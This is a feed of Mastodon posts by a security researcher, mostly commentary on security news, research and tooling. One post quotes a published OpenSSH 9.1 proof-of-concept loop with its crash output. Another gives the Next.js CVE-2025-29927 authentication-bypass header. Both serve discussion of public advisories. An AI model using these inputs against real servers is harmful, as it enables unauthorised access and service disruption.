Posts by hdm@infosec.exchange
(DIR) Post #AQYcyDBE66GyX7S6d6 by hdm@infosec.exchange
2022-12-13T03:53:36Z
0 likes, 1 repeats
Hi folks. Want to stop hearing about the bird site? Stop visiting it, stop linking to it, stop driving engagement, mute keywords, temporarily mute folks whinging about it. Just like the other commercial "social" networks, they thrive on misery and conflict, not community. Stop feeding it. It won't kill it, but your circle may stop talking about it.
(DIR) Post #AR0zuALaQURNxcDSFM by hdm@infosec.exchange
2022-12-26T21:52:15Z
1 likes, 1 repeats
Profound boredom is the root of all innovation. This paper covers it well, but every substantive project I worked on started offline with limited technical resources and lots of time to kill (metasploit, recog, runzero): https://www.bath.ac.uk/announcements/social-media-may-prevent-users-from-reaping-creative-rewards-of-profound-boredom-new-research/Offline doesn't mean no computing, just lack of boredom-driven-page-reloading. So erm, if you are seeing this, drop into offline mode, find a park, and fidget until you find something all-engrossing to sink your time into.
(DIR) Post #AR0zuBrsltrug4KlE0 by hdm@infosec.exchange
2022-12-26T22:50:42Z
0 likes, 0 repeats
OK, so what does fidget mean? What information do you have around you, right now? Take a deeper look. Why is that WiFi AP named XNF998FE? Why is your laptop's serial number XY3327S? How often is that helicopter circling? Why are so many license plates from a particular state with a specific prefix? Look for the lack of entropy that is an encoded signal.In the early Metasploit days this involved dumping function addresses of DLLs from a literal binder of DVDs. The opcode database and later analysis by folks like skape (matt miller) and spoonm made exploit development much easier as a result.Scanning the internet is easy. Understanding all the data coming back takes a lifetime. Grab some data dumps and sift through specific protocols and fields. Toss Fiddler at a Windows thick client (or enable HTTP event tracing). We are flooded in dodgy software, weak numeration, and information leaks. Stop for a bit, breath, pick one, and go deep.
(DIR) Post #ASeyG7WSsvEYGIybJI by hdm@infosec.exchange
2023-02-14T04:53:11Z
0 likes, 4 repeats
This post by the Qualys Security Advisory team demonstrating rip/pc control on OpenSSH 9.1 (running on OpenBSD!) is savage: https://seclists.org/oss-sec/2023/q1/92Here I was thinking this bug was hopeless and they one-line it without writing new code:$ cp -i /usr/bin/ssh ./ssh$ sed -i s/OpenSSH_9.1/FuTTYSH_9.1/g ./ssh$ user=`perl -e 'print "A" x 300'` && while true ;do ./ssh -o NumberOfPasswordPrompts=0 -o Ciphers=aes128-ctr -l "$user:$user" 192.168.56.123 ;done...#1 0x4141414141414141 in ?? ()
(DIR) Post #ATJG8GUXjuOiMAw43c by hdm@infosec.exchange
2023-03-05T15:33:58Z
0 likes, 0 repeats
@galdor I like @mbmcloughlin's wrapper that puts pprof on it's own server and enable/configure this via environment variables: github.com/mmcloughlin/professor
(DIR) Post #ATMSxJFfBN4bjuA54a by hdm@infosec.exchange
2023-03-07T02:57:19Z
1 likes, 1 repeats
I love crypto research that demonstrates practical attacks. The paper `A Vulnerability in Implementations of SHA-3, SHAKE, EdDSA, and Other NIST-Approved Algorithm` by Nicky Mouha and Christopher Celi demonstrates RCE (!) through controlled memory corruption in the final-round update of the Keccak code used by SHA-3. This implementation bug affected Python, PHP, and the SHA-3 Ruby package: https://eprint.iacr.org/2023/331Bonus points for dropping a Metasploit reverse TCP payload!
(DIR) Post #ATMSxL8IBkMjZcjDrU by hdm@infosec.exchange
2023-03-07T03:02:27Z
0 likes, 0 repeats
this is also not a great look: https://github.com/KeccakTeam/KeccakTools/pull/4/files
(DIR) Post #AWCTHBwjRYCAtmixBg by hdm@infosec.exchange
2023-05-31T02:34:31Z
0 likes, 0 repeats
@sj @lorddimwit the fun bit is you can replace the alarm panel brains with your own thing (and take advantage of all of the pre-wired sensors and lines). I am hoping to reuse the sensor wiring to power random Pis/ESP32s off 12v (and had good luck doing this with low-voltage lawn light wiring). This seems popular but I haven't tried it: https://support.konnected.io/what-do-i-need-to-use-the-konnected-alarm-panel
(DIR) Post #AWCYKksKXBAzrvBRui by hdm@infosec.exchange
2023-05-31T02:52:56Z
0 likes, 1 repeats
Excellent reporting by @dangoodin : Critical Barracuda 0-day was used to backdoor networks for 8 months https://arstechnica.com/information-technology/2023/05/critical-barracuda-0-day-was-used-to-backdoor-networks-for-8-months/ ... and who says Perl isn't relevant anymore =D
(DIR) Post #AWbDjQNG86Ms4R6Oo4 by hdm@infosec.exchange
2023-06-11T22:41:19Z
0 likes, 1 repeats
This #reconmtl talk by Ang Cui looks epic: Ice Ice Baby: Coppin' RAM With DIY Cryo-Mechanical Robot https://cfp.recon.cx/2023/talk/HCJHBW/(coverage at https://www.theregister.com/2023/06/09/cold_boot_ram_theft/ by @thomasclaburn)
(DIR) Post #AWdVbzDfjoUxeWlaTY by hdm@infosec.exchange
2023-06-13T03:37:54Z
0 likes, 0 repeats
@shaun this drove me nuts when I was doing external pentests; even manual testing of a customer site led to my NAT IP being put into a semi-permanent ban across dozens of large companies. It was easier to use a VPN then find a way to rotate home IPs after every test.Akamai blaming the customer for opting into a reputation filter seemed like dirty pool (since they manage that filter list). What’s the tag for “families of pen testers hate this one weird issue”
(DIR) Post #AWhiGHWF61Na4bGzHU by hdm@infosec.exchange
2023-06-13T21:26:53Z
0 likes, 0 repeats
Hackers can steal cryptographic keys by video-recording power LEDs 60 feet away: https://arstechnica.com/information-technology/2023/06/hackers-can-steal-cryptographic-keys-by-video-recording-connected-power-leds-60-feet-away/I love these kinds of attacks. Via @dangoodin at @arstechnica
(DIR) Post #AWjSSFET2iT3P8PC88 by hdm@infosec.exchange
2023-06-16T00:04:40Z
0 likes, 0 repeats
Google Domains is shutting down after selling the business to Squarespace... any great registrar recommendations? https://9to5google.com/2023/06/15/google-domains-squarespace/
(DIR) Post #AZ3qc8FDLGM1AxvTdo by hdm@infosec.exchange
2023-08-24T16:17:36Z
0 likes, 6 repeats
This is the article to send to your IT team when they refuse to enforce boot-time PINs for BitLocker:Bypassing Bitlocker using a cheap logic analyzer on a Lenovo laptop: https://www.errno.fr/BypassingBitlocker.html by Guillaume Quéré
(DIR) Post #AbLeVyZ9dNJOKtPGjo by hdm@infosec.exchange
2023-11-01T00:44:16Z
0 likes, 0 repeats
Happy Halloween!
(DIR) Post #AbLj9LDDllJhgNApfc by hdm@infosec.exchange
2023-11-01T03:05:12Z
0 likes, 0 repeats
@sj the most dangerous part is the driver
(DIR) Post #AcDkFr25IBmv43jxlg by hdm@infosec.exchange
2023-11-27T04:32:04Z
0 likes, 0 repeats
@sj “because we want to control the narrative and juice it for press” is the classic driver for denying defenders details
(DIR) Post #Adh8JjcuMI9N0fOmPY by hdm@infosec.exchange
2024-01-10T05:08:20Z
0 likes, 1 repeats
#golang PSA: If you are shipping binaries built with Go 1.21.1 or newer to Linux systems with Transparent Huge Pages (THP) enabled (default in many cases), you either need to tweak the system THP settings via SysFS or upgrade to Go 1.21.6 AND set the workaround GODEBUG=disablethp environment variable. If you don't, it can lead to what looks like a slow memory leak and eventually an out-of-memory condition. The issue doesn't affect every application (it depends on your memory use patterns), but when it does trigger, it's a pain to debug.Go docs on THP: https://go.dev/doc/gc-guide#Linux_transparent_huge_pagesGithub issue: https://github.com/golang/go/issues/64561Original Linux kernel issue: https://bugzilla.kernel.org/show_bug.cgi?id=93111Huge thanks to @TomSellers for tracking this down. The latest @runZeroInc build (4.0.240109.0) includes the fix for self-hosted customers.
(DIR) Post #AlGk8BOkGGBIdgBTk0 by hdm@infosec.exchange
2024-08-23T19:56:24Z
1 likes, 0 repeats
A great post by Ben Hawkes on the then and now of OpenSSH backdoors: https://blog.isosceles.com/openssh-backdoors/Some highlights:>In practice though, everyone runs a systemd-based Linux distribution of some sort – in which case you end up running code from around 30 different packages in your OpenSSH address space (including our friends xz and zlib of course). That's already starting to get uncomfortable.>That means the supply chain integrity for practically everything relies on the integrity of a2hosting.com and the absence of any remote exploits in CPanel or exim.
(DIR) Post #AsLLNLVjzcxWU0Nww4 by hdm@infosec.exchange
2025-03-23T02:42:56Z
2 likes, 1 repeats
Next.js dropped a CVSS 9.1 authentication bypass vulnerability (CVE-2025-29927) over the weekend. This flaw is trivially exploitable by sending the header `x-middleware-subrequest: true` and causes the request to skip all middleware processing, including any authentication steps. Shodan reports over 300,000 services with the `X-Powered-By: Next.js` header alone.You can find links to the advisory and queries for runZero at: https://www.runzero.com/blog/next-js/